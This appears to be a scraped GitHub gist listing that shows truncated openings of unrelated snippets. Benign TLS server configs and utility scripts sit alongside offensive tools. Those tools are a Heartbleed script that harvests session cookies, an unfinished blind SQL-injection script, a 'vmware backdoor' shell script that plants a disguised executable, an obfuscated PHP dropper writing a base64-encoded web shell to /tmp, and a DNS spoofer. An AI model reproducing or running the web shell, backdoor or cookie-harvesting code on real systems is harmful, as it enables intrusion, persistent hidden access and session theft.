This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions. | |
# Michael Davis (mike.philip.davis@gmail.com) | |
# Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) | |
# The author disclaims copyright to this source code. | |
import select |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// PhantomJS script | |
// Takes screeshot of a given page. This correctly handles pages which | |
// dynamically load content making AJAX requests. | |
// Instead of waiting fixed amount of time before rendering, we give a short | |
// time for the page to make additional requests. | |
var _ = require('./lodash.js'); | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import itertools | |
from sys import exit | |
any_digits = [1.67, 1.98, 1.98, 4.41, 4.41, 4.41, 4.41, 4.41, 5.44, 36, 36, 36, 36, 36, 36, 36, 36, 100, 100] | |
for L in range(0, len(any_digits)+1): | |
for subset in itertools.combinations(any_digits, L): | |
print '%.2f' % sum(subset) | |
if '%.2f' % sum(subset) == 241.40: | |
print 'found it!' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<VirtualHost *:443> | |
SSLEngine on | |
SSLCertificateFile /path/to/signed_certificate | |
SSLCertificateChainFile /path/to/intermediate_certificate | |
SSLCertificateKeyFile /path/to/private/key | |
SSLCACertificateFile /path/to/all_ca_certs | |
# modern configuration, tweak to your needs | |
SSLProtocol all -SSLv2 -SSLv3 -TLSv1 | |
SSLCipherSuite ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:DHE-RSA-AES128-GCM-SHA256:DHE-DSS-AES128-GCM-SHA256:kEDH+AESGCM:ECDHE-RSA-AES128-SHA256:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:DHE-RSA-AES128-SHA256:DHE-RSA-AES128-SHA:DHE-DSS-AES128-SHA256:DHE-RSA-AES256-SHA256:DHE-DSS-AES256-SHA:DHE-RSA-AES256-SHA:!aNULL:!eNULL:!EXPORT:!DES:!RC4:!3DES:!MD5:!PSK |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
server { | |
listen 443 ssl; | |
# certs sent to the client in SERVER HELLO are concatenated in ssl_certificate | |
ssl_certificate /path/to/signed_cert_plus_intermediates; | |
ssl_certificate_key /path/to/private_key; | |
ssl_session_timeout 5m; | |
ssl_session_cache shared:SSL:50m; | |
# Diffie-Hellman parameter for DHE ciphersuites, recommended 2048 bits |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
##NOT FINISHED## | |
## ©mastahyeti 2011## | |
import urllib2 | |
import urllib | |
import time | |
import math | |
CHARSET = [chr(x) for x in xrange(32,39)] + [chr(x) for x in xrange(40,127)] #everything but ' | |
CHARSET_LEN = len(CHARSET) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# vmware backdoor if the dir don’t exist (which it should) create it anyway | |
mkdir -p /usr/lib/vmware-tools/bin32 | |
vmwarestamp="`ls -l /usr/bin/lsof 2>log.error | awk {'print $6'}`" | |
echo $vmwarestamp | |
touch ./vmware-vnet1 | |
chmod 755 ./vmware-vnet1 | |
read -d '' vmware <<"BLOCK" | |
#!/bin/bash |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?PHP | |
$b = 'bas'.'e64'.'_de'.'code'; | |
file_put_contents('/tmp/asd', $b('P D 9 Q S F A K Z n V u Y 3 R p b 2 4 g b G x l a H M o J G N t Z C w g J G F y c m F 5 I D 0 g d H J 1 Z S l 7 C i A g I C B p Z i A o I W V t c H R 5 K C R j b W Q p K X s K I C A g I C A g I C B p Z i A o Y G V j a G 8 g Y W A p e y A k c 2 F s a W R h W 1 0 9 K G A k Y 2 1 k Y C k 7 I C R z Y W x p Z G F b X T 0 n T W 9 k b z o g Y C R j b W R g J z t 9 C i A g I C A g I C A g C i A g I C A g I C A g Z W x z Z W l m I C h z a G V s b H B v c G V u K C d l Y 2 h v I G E n K S l 7 J H N h b G l k Y V t d P X N o Z W x s c G 9 w Z W 4 o J G N t Z C k 7 I C R z Y W x p Z G F b X T 0 n T W 9 k b z o g c G 9 w Z W 4 o J G N t Z C k n O 3 0 K I C A g I C A g I C A K I C A g I C A g I C B l b H N l a W Y g K H N o Z W x s X 2 V 4 Z W M o J 2 V j a G 8 g Y S c p K X s k c 2 F s a W R h W 1 0 9 c 2 h l b G x f Z X h l Y y g k Y 2 1 k K T s g J H N h b G l k Y V t d P S d N b 2 R v O i B z a G V s b F 9 l e G V j K C R j b W Q p J z t 9 C i A g |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# File: fakedns.py | |
# Name: Interactive CLI DNS Spoofer | |
# by: @mastahyeti | |
# | |
# based off of http://code.activestate.com/recipes/491264/ | |
from __future__ import print_function | |
from gevent.event import Event | |
from gevent.pool import Pool | |
from gevent import socket |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
CON | |
_clkmode = xtal1 + pll16x | |
_xinfreq = 5_000_000 | |
VAR | |
long foodude | |
long datatown | |
byte hello |
OlderNewer